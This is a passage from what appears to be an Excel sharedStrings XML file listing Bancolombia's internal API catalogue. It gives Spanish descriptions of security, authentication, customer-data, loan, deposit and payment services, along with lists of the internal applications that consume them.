    <t>Esta API permite la consulta de la relación que tiene un cliente de los segmentos personas o empresas con las siguientes caracterí­sticas: Si está actuando bajo nombre propio, si es una persona natural, si es una persona jurí­dica. Validando así­ las delegaciones que tenga un titular a un usuario delegado.  De tal forma que permite decidir si la persona, tiene permiso para acceder a productos propios o delegados por terceros, bajo un nivel de privilegios asignados a un rol.</t>
  </si>
  <si>
    <t>Security Access Entitlement Delegates</t>
  </si>
  <si>
    <t>Security Access Entitlement Delegates - Information</t>
  </si>
  <si>
    <t>security-access-entitlement-delegates-information</t>
  </si>
  <si>
    <t>Esta API permite la consulta de un usuario delegado. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos no propios otorgados por el dueí±o del producto o representante legal.</t>
  </si>
  <si>
    <t>Entitlement_NU0141001</t>
  </si>
  <si>
    <t>Security Access Entitlement Delegates - Management</t>
  </si>
  <si>
    <t>security-access-entitlement-delegates-management</t>
  </si>
  <si>
    <t>Esta API permite la gestión de un usuario delegado persona natural y persona jurí­dica.Se tiene una operación de crear la relación de un usuario delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de delegado con un cliente persona natural y la relación de un usuario delegado con un cliente persona jurí­dica.</t>
  </si>
  <si>
    <t>Security Access Entitlement Owners</t>
  </si>
  <si>
    <t>Security Access Entitlement Owners - Information</t>
  </si>
  <si>
    <t>security-access-entitlement-owners-information</t>
  </si>
  <si>
    <t>Esta API permite la consulta de un usuario titular persona natural y persona jurí­dica. indicando su identidad, rol, privilegios asignados, grupo de productos asociados, recursos asignados y el estado. De tal forma que permite validar si la persona, tiene permiso para acceder a productos propios 'como dueí±o del producto o representante legal.</t>
  </si>
  <si>
    <t>Security Access Entitlement Owners - Management</t>
  </si>
  <si>
    <t>security-access-entitlement-owners-management</t>
  </si>
  <si>
    <t>Esta API permite la gestión de un usuario titular persona natural y persona jurí­dica. Se tienen dos operaciones de crear la relación de un usuario titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica.La capacidad de eliminar es transversal para las relaciones de titular con un cliente persona natural y la relación de un usuario titular con un cliente persona jurí­dica.</t>
  </si>
  <si>
    <t>Security Access Entitlement Privileges</t>
  </si>
  <si>
    <t>Security Access Entitlement Privileges - Information</t>
  </si>
  <si>
    <t>security-access-entitlement-privileges-information</t>
  </si>
  <si>
    <t>El API Security Access Entitlement - Information permite consultar los privilegios disponibles que tiene un usuario con el fin de gestionar sus relaciones en Entitlement.</t>
  </si>
  <si>
    <t>Security Access Entitlement Schemes</t>
  </si>
  <si>
    <t>Security Access Entitlement Schemes - Information</t>
  </si>
  <si>
    <t>security-access-entitlement-schemes-information</t>
  </si>
  <si>
    <t>El Api permite consultar los esquemas de un cliente asociados a Entitlement, se tienen los siguientes esquemas Administración íºnica: Ejecutor directo es el equema que permite tener un usuario super poderoso, para usar este se requiere  un usuario al cual se le debe asignar el rol titular. Administración míºltiple: Control Dual es el equema que permite tener dos usuarios depedientes uno del otro, para usar este esquema se requieren 2 usuarios a los cuales se le debe asignar el rol titular. titularAdministración míºltiple x2:  Control dual X 2 es el equema que permite tener 4 usuarios, divididos en dos grupos monetario y no monetario, para usar este esquema se requieren 4 usuarios, 2 de ellos con rol titular monetario y los otros 2 con rol titular no monetario.Administración míºltiple x3:  Control dual X 3 es el esquema que permite tener 6 usuarios, divididos en tres grupos monetario, no monetario y administrativo, para usar este esquema se requieren 6 usuarios, 2 de ellos con rol titular monetario , los otros 2 con rol titular no monetario y los ultimos 2 titular administrativo</t>
  </si>
  <si>
    <t>Security Alphanumeric</t>
  </si>
  <si>
    <t>Security Alphanumeric - Passwords Management</t>
  </si>
  <si>
    <t>security-alphanumeric-passwords-management</t>
  </si>
  <si>
    <t>Esta API permite gestionar la creación, validación y cambio de clave alfanumérica que está asociada al alias de un usuario para el ingreso desde un canal consumidor. La clave alfanumérica debe tener como mí­nimo 8 caracteres otorgando así­ una mayor seguridad al ingreso de cualquier canal, generando un control más disuasivo para intentos de adivinación, reduciendo el níºmero de clientes suplantados por adivinación acogiéndose a los estándares de la industria para la autenticación.</t>
  </si>
  <si>
    <t>Security Application</t>
  </si>
  <si>
    <t>Security Application - Event Records</t>
  </si>
  <si>
    <t>security-application-event-records</t>
  </si>
  <si>
    <t>Esta API permite la consulta de los eventos funcionales de las aplicaciones del ecosistema de seguridad, de forma de que el manejo de estos eventos sea estándar obteniendo la información sobre los sucesos en cada una de las aplicaciones.  Ofrece la capacidad de realizar la consulta por procesos, acciones, aplicaciones o actores que generaron registros en las aplicaciones.</t>
  </si>
  <si>
    <t>Security Channel</t>
  </si>
  <si>
    <t>Security Channel - Authentication Credentials</t>
  </si>
  <si>
    <t>security-channel-authentication-credentials</t>
  </si>
  <si>
    <t>Esta API permite una autenticación de credenciales la cual retorna un token JWT que contiene la información del cliente, íºltima fecha y hora de acceso y token de sesión, para que los consumidores puedan tranzar en los diferentes aplicativos del banco. Se puede generar usando las credenciales cifradas del cliente, es decir, cuando el Cliente se autentica.</t>
  </si>
  <si>
    <t>APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>Security Code</t>
  </si>
  <si>
    <t>Security Code - Management</t>
  </si>
  <si>
    <t>security-code-management</t>
  </si>
  <si>
    <t>Esta API ofrece las capacidades que permiten realizar la generacion de un codigo de seguridad y la validacion de este mismo.</t>
  </si>
  <si>
    <t>AW133302_securityCode _x000D_
 BNPL_NU0287001</t>
  </si>
  <si>
    <t>Management_AW1333002</t>
  </si>
  <si>
    <t>Security Contacts</t>
  </si>
  <si>
    <t>Security Contacts - Information</t>
  </si>
  <si>
    <t>security-contacts-information</t>
  </si>
  <si>
    <t>El api de 'Security Contacts - Information'? es la capacidad que se ofrece a los clientes Bancolombia, para obtener la información relacionada de los clientes con personas de su entera confianza que puedan autenticar por medio de un código enviado la información de un cliente. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras.  El api de Security Contacts - Information contará la capacidad de consultar los contactos de ayuda asociados a un cliente por medio de la operación Listar contactos.</t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001 _x000D_
 ALM_AW0955001</t>
  </si>
  <si>
    <t>Security Contacts - Management</t>
  </si>
  <si>
    <t>security-contacts-management</t>
  </si>
  <si>
    <t>El api de Security Contacts - Management es la capacidad que se ofrece a los clientes Bancolombia, para administrar y gestionar los contactos de ayuda de un cliente, que son personas de su entera confianza que puedan autenticar por medio de un código enviado la información del mismo. Los escenarios de uso de la capacidad son referentes a confirmaciones que tendrá que realizar un cliente cuando requiera realizar algíºn proceso que tenga este flujo de contactos establecido. Vinculación de un contacto, desbloqueo de la clave dinámica, confirmación para modificar información entre otras.</t>
  </si>
  <si>
    <t>Security Contacts - OTP</t>
  </si>
  <si>
    <t>security-contacts-otp</t>
  </si>
  <si>
    <t>El Api de Security Contacts - OTP es la capacidad que se ofrece a los clientes Bancolombia, para validar temas referentes a acciones dentro de los canales banco por medio de personas de su entera confianza que han sido previamente vinculadas para que  puedan autenticar por medio de un código enviado la información de un cliente.</t>
  </si>
  <si>
    <t>Security Session Id</t>
  </si>
  <si>
    <t>Security Session Id - OAuth</t>
  </si>
  <si>
    <t>security-session-id-oauth</t>
  </si>
  <si>
    <t>Api que permite cambiar el Id de sesión para canales virtuales por un token de acceso</t>
  </si>
  <si>
    <t>EASYHOME_NU0004001 _x000D_
 SVP_NU0004001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 PortalConstructor_AW0360004 _x000D_
 FUA_AW1291001 _x000D_
 HabitatCore_AW1281003 _x000D_
 PEP_AW1281002 _x000D_
 HDC_AW0453001 _x000D_
 SVETDL_AW0360006 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 AW1312001_SVS_ENROLAMIENTO _x000D_
 Networking_NU0046001 _x000D_
 CGC_NU0014001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 NETWORKING_NU0046001 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 MigracionFUA_AW1291001 _x000D_
 LoansOffer_NU0102001 _x000D_
 SVECarteraComercial_NU0162001 _x000D_
 Transversal_AW0937001 _x000D_
 BancolombiaPay_AW1435001</t>
  </si>
  <si>
    <t>PEP_AW1281002 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 Marketplacetu360HM_NU0035001 _x000D_
 SVECarteraComercial_NU0162001 _x000D_
 HDC_AW0453001 _x000D_
 EASYHOME_NU0004001 _x000D_
 BNPL_NU0287001 _x000D_
 HabitatCore_AW1281003 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 BancolombiaPay_AW1435001 _x000D_
 CGC_NU0014001 _x000D_
 ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>Security Session Management</t>
  </si>
  <si>
    <t>Security Session Management - Session Management</t>
  </si>
  <si>
    <t>security-session-management</t>
  </si>
  <si>
    <t>MigracionFUA_AW1291001 _x000D_
 PortalAutogestionPyme_AW1287 _x000D_
 SVSENROLAMIENTO_AW1312001 _x000D_
 SVSENROLAMIENTO_AW1312001 _x000D_
 AdaptadorMarketplace_NU0143001 _x000D_
 HDC_AW0453001 _x000D_
 Transversal_AW0937001 _x000D_
 PEP_AW1281002 _x000D_
 ModuloNegociosFiduciarios_NU0247001</t>
  </si>
  <si>
    <t>Security Simple Authentication</t>
  </si>
  <si>
    <t>Security Simple Authentication - OAuth</t>
  </si>
  <si>
    <t>security-simple-authentication-oauth</t>
  </si>
  <si>
    <t>FUA_AW1291001 _x000D_
 PEP_AW1281002 _x000D_
 EDIN_AW1185001 _x000D_
 MigracionFUA_AW1291001</t>
  </si>
  <si>
    <t>PEP_AW1281002 _x000D_
 EDIN_AW1185001</t>
  </si>
  <si>
    <t>Seguimiento Solicitudes Cliente</t>
  </si>
  <si>
    <t>Este servicio tiene la capacidad de permitir a las diferentes áreas del banco registrar las novedades de una solicitud y poder consultar el estado de la solicitud.</t>
  </si>
  <si>
    <t>Seguridad Informacion Tarjetas</t>
  </si>
  <si>
    <t>El servicio de seguridad información tarjetas, permite consultar la información sensible de las tarjetas de crédito, débito y e-prepago.</t>
  </si>
  <si>
    <t>AW1189001 _x000D_
NU0019001 _x000D_
NU0103001</t>
  </si>
  <si>
    <t>Seguro De Retiro En Cajero</t>
  </si>
  <si>
    <t xml:space="preserve">Esta versión permite a los consumidores la opción de asegurar un retiro de dinero en cajeros como el electrónico, adicionalmente permite conocer la información de los retiros que han sido asegurados. </t>
  </si>
  <si>
    <t>NU0021001 _x000D_
DEVELOPSOATEST _x000D_
AW1151001 _x000D_
NU0084001</t>
  </si>
  <si>
    <t>Customer Investment Authentication</t>
  </si>
  <si>
    <t>Session Token - Management</t>
  </si>
  <si>
    <t>customer-investment-authentication-session-token-management</t>
  </si>
  <si>
    <t>Permite la creación y validación de token de sesión para un cliente en especí­fico en Valores Bancolombia.</t>
  </si>
  <si>
    <t>Simulation</t>
  </si>
  <si>
    <t>El API Simulación del Crédito? se encarga de recibir los datos básicos, valores y plazo de un posible crédito, para proceder a generar una simulación y responder con los resultados de cuotas y demás datos de pagos que el cliente asumirá, para que con dicha información pueda tomar la decisión de iniciar la radicación del estudio de crédito. Esta API será genérica para cualquier producto o lí­nea de negocio en SUFI.</t>
  </si>
  <si>
    <t>Sincronizacion Estados PQRS</t>
  </si>
  <si>
    <t>El servicio permite reportar el estado de los PQR de queja o reclamos de origen banco o de la superfinanciera</t>
  </si>
  <si>
    <t>Tatiana Andrea Cardenas</t>
  </si>
  <si>
    <t>AW0611001 _x000D_
AW611001</t>
  </si>
  <si>
    <t>SME Credit Cards</t>
  </si>
  <si>
    <t>SME Credit Cards - cards information</t>
  </si>
  <si>
    <t>sme-credit-cards-cards-information</t>
  </si>
  <si>
    <t>El API  permite consultar la información de tarjetas de crédito para PYME. Permite listar las tarjetas PYME de un cliente o consultar los saldos consolidados de las tarjetas asociadas a un cliente PYME.</t>
  </si>
  <si>
    <t>ConsultaTarjetasPYME/V1.0</t>
  </si>
  <si>
    <t>LimitsCreditExhibition_NU0114001</t>
  </si>
  <si>
    <t>Sms Notifications</t>
  </si>
  <si>
    <t>Sms Notifications - Send Sms Message</t>
  </si>
  <si>
    <t>sms-notifications-send-sms-message</t>
  </si>
  <si>
    <t xml:space="preserve">La Api permite realizar el enví­o de mensajes SMS a través del proveedor de delivery Inalambria. Este servicio está enfocado a consumidores transaccionales que realizan enví­o de mensajes a partir de la ocurrencia de una transacción o evento en un proceso de un producto, que amerite comunicarse a los clientes. </t>
  </si>
  <si>
    <t>BIZAGIAC_AW1285001 _x000D_
 APM_AW1097001 _x000D_
 PortalAutogestionPyme_AW1287 _x000D_
 Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 Decision-Manager_NU0010001 _x000D_
 LoansApproval_NU107001 _x000D_
 prueba _x000D_
 CuponPagosDigital_AW0214001 _x000D_
 Inversi_NU0160001</t>
  </si>
  <si>
    <t>Solicitud De Autorizacion</t>
  </si>
  <si>
    <t>Este servicio permite a los diferentes sistemas de Bancolombia solicitar que se autorice a un perfil de usuario sobre un archivo existente en una ruta ifs del iSeries</t>
  </si>
  <si>
    <t>SEGRAUTOBJ (AS400)</t>
  </si>
  <si>
    <t>AW01065 _x000D_
SU2 _x000D_
SUF _x000D_
ALM _x000D_
NU0001 _x000D_
AW1078 _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Sufi Loan</t>
  </si>
  <si>
    <t>Sufi Loan - Loans Information</t>
  </si>
  <si>
    <t>La API Sufi Loan - Loans Information tiene como objetivo obtener todas las obligaciones o sus detalles.  Esta posee las siguientes operaciones: --- - Consulta de obligaciones básica: Todas las obligaciones a partir de un documentId - Consulta de obligaciones detallada: Detalles de una obligación a partir de su loanId - Consulta de obligaciones por alianza: Consulta todas las obligaciones como la consulta de obligaciones básica además de filtrar por su respectiva alianza.</t>
  </si>
  <si>
    <t>DesembolsosSufi_AW1097001 _x000D_
 Monitoreo_AW1097001 _x000D_
 adaptadorSufi_ISSU20003 _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Sufi Loan - Transactions</t>
  </si>
  <si>
    <t>transactions</t>
  </si>
  <si>
    <t>La API Sufi Loan - Transactions tiene como objetivo entregar información correspondiente a los movimientos o transacciones realizadas por pagos a una obligación puntual obtenida por el cliente.  Esta posee las siguiente operación: --- - Consulta de Transacciones: Todas los movimientos de una obligación a partir de un loanId</t>
  </si>
  <si>
    <t>Tec-Commerce Portal</t>
  </si>
  <si>
    <t>Tec - commerce portal channel - customer information</t>
  </si>
  <si>
    <t>tec-commerce-portal-channel-customer-information</t>
  </si>
  <si>
    <t>Esta API permitirá exponer las diferentes consultas que desde el canal portal comercio se requieren para la administración del canal desde el Modulo Administrativo u otros canales o consumidores que requieran acceder a la información del canal y a sus diferentes funcionalidades.</t>
  </si>
  <si>
    <t>Portal Comercio</t>
  </si>
  <si>
    <t>Modulo Administrativo Canales Digitales_AW1204 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Tec-Payments ACH Fulfillment</t>
  </si>
  <si>
    <t>Tec - Customer - Enrollment</t>
  </si>
  <si>
    <t>tec-customer-enrollment</t>
  </si>
  <si>
    <t>El API  permite vincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el  número de celular para realizar las transferencias Inmediatas en ACH en Lí­nea.</t>
  </si>
  <si>
    <t>CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>Tec - Customer</t>
  </si>
  <si>
    <t>Tec - Customer - General Information</t>
  </si>
  <si>
    <t>tec-customer-general-information</t>
  </si>
  <si>
    <t>API que permite consultar la informacion general de un cliente sea persona natural o jurí­dica.</t>
  </si>
  <si>
    <t>BC_Herramientas_Monitoreo _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 TMP Boton Bancolombia_BDT _x000D_
 GestionaNegocios_AW1302001 _x000D_
 PortalSalaDeVentas_AW1258002 _x000D_
 plink_AW1206001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 APM_NU0032001 _x000D_
 LifeCoach_AW1240001 _x000D_
 CapaGestionCanal_NU0014001 _x000D_
 Recargas_AW1300001 _x000D_
 TabotWhatsapp_AW1165 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 NEQUIMDM_AW1011 _x000D_
 creditlens_NU0038001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 HabitatCore_AW1281003</t>
  </si>
  <si>
    <t>Tec - Customer - Obtain Payment Methods</t>
  </si>
  <si>
    <t>tec-customer-obtain-payment-methods</t>
  </si>
  <si>
    <t>Permite obtener el grupo de productos desde los cuales se puede realizar el pago</t>
  </si>
  <si>
    <t>ConsultaProductoDepositos/V1.0</t>
  </si>
  <si>
    <t>Tec - Customer Contact</t>
  </si>
  <si>
    <t>Tec - Customer - Query Contact Information</t>
  </si>
  <si>
    <t>tec-customer-query-contact-information</t>
  </si>
  <si>
    <t>API que permite realizar la consulta de información del contacto del cliente, tal como: dirección de residencia, dirección de oficina, teléfono fijo, teléfono móvil, email, entre otros.</t>
  </si>
  <si>
    <t>ConsultaDatosContactoCliente/V1.0</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 plink_AW1206001 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 HabitatCore_AW1281003 _x000D_
 GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>Tec - Customer - Query Keys</t>
  </si>
  <si>
    <t>tec-customer-query-keys</t>
  </si>
  <si>
    <t>API que permite consultar una llave de identificación especifica del cliente según una identificación de entrada. Es decir, que de un tipo y número de identificación puedo obtener la llave MDM del cliente o en otro caso, a partir de la llave MDM puedo consultar cual es la llave CIF. Permite consultar la llave especí­fica a partir de: la llave MDM, llave CIF, llave CRM y el tipo/número de identificación. Y las llaves resultantes pueden ser: la llave MDM, llave CIF, llave CRM.</t>
  </si>
  <si>
    <t>Tec - Customer Commercial Data</t>
  </si>
  <si>
    <t>Tec - Customer Commercial Data - Query management</t>
  </si>
  <si>
    <t>tec-customer-commercial-data-query-management</t>
  </si>
  <si>
    <t>API que permite realizar la consulta de la gestión comercial del cliente. Esta información esta divida en dos operaciones de la siguiente forma:  Gestión comercial: permite la consulta de información para realizar la gestión comercial al cliente, tal como: rol, responsable comercial del cliente, oficina de vinculación, nicho de mercado, segmento, subsegmento, entre otros. Gestión comercial ECA (equipo comercial amplificado): permite proveer información de otras relaciones comerciales existentes entre el cliente y los negocios especializados de moneda extranjera, inversión, fiduciaria, Leasing, etc. Tanto para Personas de las bancas personas y pymes, como para personas de la banca de empresas y gobierno.</t>
  </si>
  <si>
    <t>Analitica y Big Data</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 creditlens_NU0038001 _x000D_
 GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>Tec - Leasing</t>
  </si>
  <si>
    <t>Tec - Customer Leasing - Information</t>
  </si>
  <si>
    <t>tec-customer-leasing-information</t>
  </si>
  <si>
    <t>El api Tec Customer Leasing - Information permitirá a los consumidores consultar y más adelante modificar información relacionada con los clientes de Leasing.</t>
  </si>
  <si>
    <t>SVETDL_AW0360006 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Tec-Customer Personal Data</t>
  </si>
  <si>
    <t>Tec - Customer Personal Data - Query Information</t>
  </si>
  <si>
    <t>tec-customer-personal-data-query-information</t>
  </si>
  <si>
    <t>API que permite realizar la consulta de los datos personales del cliente: La información personal básica de un cliente, tales como: tipo documento, número documento, nombre completo, rol, datos de vinculación, entre otros. La información detallada de un cliente, tales como: fecha y ciudad de expedición de documento de identidad, fecha de nacimiento, primer nombre, segundo nombre, primer apellido, segundo apellido, genero, tratamiento del cliente, entre otros.</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 SUID_AW1310 _x000D_
 PortalSalaDeVentas_AW1258002 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 creditlens_NU0038001 _x000D_
 MovilidadCore_AW1281002 _x000D_
 CapaGestionCanal_NU0014001 _x000D_
 HabitatCore_AW1281003 _x000D_
 GestionaNegocios_AW1302001</t>
  </si>
  <si>
    <t>Tec-Accounts</t>
  </si>
  <si>
    <t>Tec - Deposit - Account Balance</t>
  </si>
  <si>
    <t>tec-deposit-account-balance</t>
  </si>
  <si>
    <t>Permite la consulta de saldo de todas las cuentas de depósitos de personas: Ahorros y corrientes.</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 NEQUICUEDEP_AW1011 _x000D_
 EDPYME_AW1170 _x000D_
 CapaGestionCanal_NU0014001 _x000D_
 PORTALCOBRANZA_AW1294001</t>
  </si>
  <si>
    <t>Tec - Deposits</t>
  </si>
  <si>
    <t>Tec - Deposit - Monetary Affectation</t>
  </si>
  <si>
    <t>tec-deposit-monetary-affectation</t>
  </si>
  <si>
    <t>Permite realizar la transaccionalidad de Cuentas de Ahorro/Corrientes.</t>
  </si>
  <si>
    <t>BC_Herramientas_Monitoreo _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 TMP Boton Bancolombia_BDT</t>
  </si>
  <si>
    <t>Tec - Deposit - Transference</t>
  </si>
  <si>
    <t>tec-deposit-transference</t>
  </si>
  <si>
    <t>Permite realizar un pago con transferencia entre cuentas de depositos de clientes Bancolombia.</t>
  </si>
  <si>
    <t>PagoConTransferencia/V1.0</t>
  </si>
  <si>
    <t>Tec - Email Notifications</t>
  </si>
  <si>
    <t>Tec - Email Notifications - Send</t>
  </si>
  <si>
    <t>tec-email-notifications-send</t>
  </si>
  <si>
    <t>API que permite el enví­o de correo electrónico básico o en diferentes formatos (con clave, con pdf, con adjunto base64, encriptado). A la fecha el servicio tiene como proveedor a Masivian. A continuación, se nombran estas funcionalidades: â€¢ Enví­o correo electrónico con un contenido básico.  En esta segunda versión se agrega se agrega esta operación de manera que se tiene que deprecar del servicio â€œGwe-Notification-mail-basicâ€? y migrar a esta nueva api los consumidores. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo adjunte al mensaje. Pendiente por apificar y deprecar del servicio. â€¢ Enví­o correo electrónico con adjunto pdf generado por el banco y puesto en una ruta SFTP para que el proveedor de correo (Masivian) lo proteja con contraseña y lo adjunte al mensaje. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto pdf generado por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar â€¢ Enví­o correo electrónico con adjunto pdf generado y protegido con clave por el proveedor de correo (Masivian) utilizando una plantilla previamente cargada en su sistema. Pendiente por apificar. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique y lo adjunte como pdf en el mensaje. â€¢ Enví­o correo electrónico con adjunto enviado en base64 en el mensaje xml, para que el proveedor de correo (Masivian) lo decodifique, lo proteja con clave y lo adjunte como pdf en el mensaje. NOTA\: Al momento de especificar esta API, ya existí­a una con el nombre de â€œGwe-Notication-mail-basicâ€?, acoplada a la funcionalidad â€œenví­o correo básicoâ€?, adicional a lo anterior carece de un campo messageId y esto evita su trazabilidad en caso de incidente por las razones anteriores no se agregarán mas operaciones a esa API.</t>
  </si>
  <si>
    <t>MACINV-RPA20190002_AW1172001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 BIZAGIAC_AW1285001 _x000D_
 HabitatCore_AW1281003 _x000D_
 Historia del Cliente_NU0090001</t>
  </si>
  <si>
    <t>Tec - Financial Leasing - Operation Information</t>
  </si>
  <si>
    <t>tec-financial-leasing-operation-information</t>
  </si>
  <si>
    <t>El API Tec - Financial Leasing  Operation Information permitirá a los consumidores consultar diferente información relacionada con las operaciones de leasing financiero en estados de anticipo, definitivos o cancelados.</t>
  </si>
  <si>
    <t>Tec - Financial Operations - Payments</t>
  </si>
  <si>
    <t>tec-financial-operations-payments</t>
  </si>
  <si>
    <t>El API Tec Financial Operations Payments permitirá a los consumidores consultar los diferentes pagos: al dí­a, pagos anteriores, pagos futuros o en mora para las operaciones de Leasing Financiero en estado definitiva o en anticipo.</t>
  </si>
  <si>
    <t>Tec - Fund Administration - Consolidated Balances</t>
  </si>
  <si>
    <t>tec-fund-administration-consolidated-balances</t>
  </si>
  <si>
    <t>Esta API permite consultar el saldo consolidado de los fondos de inversión tanto de valores como de fiduciaria de un cliente del grupo Bancolombia.</t>
  </si>
  <si>
    <t>Tec - Fund Administration - Transactions</t>
  </si>
  <si>
    <t>tec-fund-administration-transactions</t>
  </si>
  <si>
    <t>Tec - Leasing Notification - Send Reports</t>
  </si>
  <si>
    <t>tec-leasing-notification-send-reports</t>
  </si>
  <si>
    <t>El API permitirá a los consumidores hacer solicitudes al back de leasing para la generación y enví­o de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro.</t>
  </si>
  <si>
    <t>Tec - Loans</t>
  </si>
  <si>
    <t>Tec - Loans - Enquiry</t>
  </si>
  <si>
    <t>tec-loans-enquiry</t>
  </si>
  <si>
    <t>BC_Herramientas_MonitoreoPrd _x000D_
 BALMTEC_AW0955 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 PortalLibranzas_AW0360007</t>
  </si>
  <si>
    <t>Tec - Loans - Loan Applications</t>
  </si>
  <si>
    <t>tec-loans-loan-applications</t>
  </si>
  <si>
    <t>SolicitudDeCredito/V1.0
SolicitudDeCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>Tec - Loans - Maximum Loan Amount</t>
  </si>
  <si>
    <t>tec-loans-maximum-loan-amount</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API expone un método que permite obtener el límite que un cliente tiene asociado a productos crediticios entre los cuales no se consideran ni Leasing ni tarjetas de crédito. </t>
  </si>
  <si>
    <t>Tec - Loans Collaterals</t>
  </si>
  <si>
    <t>tec-loans-collaterals</t>
  </si>
  <si>
    <t>Esta API permite consultar la información general de las garantí­as asociadas a un cliente</t>
  </si>
  <si>
    <t>Tec - Payments</t>
  </si>
  <si>
    <t>Tec - Payments - Bancolombia Button Management</t>
  </si>
  <si>
    <t>tec-payments-bancolombia-button-management</t>
  </si>
  <si>
    <t>El api Tec - Payments - Bancolombia Button Management permite realizar diferentes operaciones relacionadas con el boton Bancolombia.</t>
  </si>
  <si>
    <t>Ecosistema De Pagos_AW1314001 _x000D_
 GestionaNegocios_AW1302001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 EDPYME_AW1170 _x000D_
 BALMTEC_AW0955 _x000D_
 Portal Contenidos Bancolombia_AW1218001</t>
  </si>
  <si>
    <t>Tec - Payments - QR Management</t>
  </si>
  <si>
    <t>tec-payments-qr-management</t>
  </si>
  <si>
    <t>El api Tec - Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.</t>
  </si>
  <si>
    <t>Tec - Payments - Transaction Logs Management</t>
  </si>
  <si>
    <t>tec-payments-bancolombia-logs-management</t>
  </si>
  <si>
    <t>El api Tec - Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago.</t>
  </si>
  <si>
    <t>Tec-Security</t>
  </si>
  <si>
    <t>Tec - Security - Encrypted key</t>
  </si>
  <si>
    <t>tec-security-encrypted-key</t>
  </si>
  <si>
    <t>TMP_SVP_APP_PFM _x000D_
 TMP SOPORTE APP_lgcorrg _x000D_
 TMP AW0360004_CONSTRUCTOR_SVE _x000D_
 BC_Herramientas_Monitoreo _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 GestionaNegocios_AW1302001 _x000D_
 TABOT_AW1165001 _x000D_
 SVETDL_AW0360006 _x000D_
 PortalLibranzas_AW0360007 _x000D_
 BALMTEC_AW0955 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 AppInversiones_AW1185001</t>
  </si>
  <si>
    <t>TMP Boton Bancolombia_BDT _x000D_
 SUID_AW1310 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 PortalConstructor_AW0360004 _x000D_
 AppInversiones_AW1185001 _x000D_
 MarketplaceEcosistemasPersonas_NU0035001 _x000D_
 BCHerramientasMonitoreoPrd2 _x000D_
 FUA_AW1291001 _x000D_
 NEQUIMAPAS_AW1011 _x000D_
 CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>Tec - Support</t>
  </si>
  <si>
    <t>Tec - Token DID - Consult and Send</t>
  </si>
  <si>
    <t>tec-token-did-consult-send</t>
  </si>
  <si>
    <t>Esta API permite realizar la consulta del tipo de enrolamiento en clave dinamica, y al mismo tiempo la generación y el envio del token ODA, dependiendo de la configuración del usuario.</t>
  </si>
  <si>
    <t>Magda Catalina Trejos</t>
  </si>
  <si>
    <t>GestionAutenticacionFuerte/V1.0</t>
  </si>
  <si>
    <t>TMP Boton Bancolombia_BDT _x000D_
 BC_Herramientas_Monitoreo _x000D_
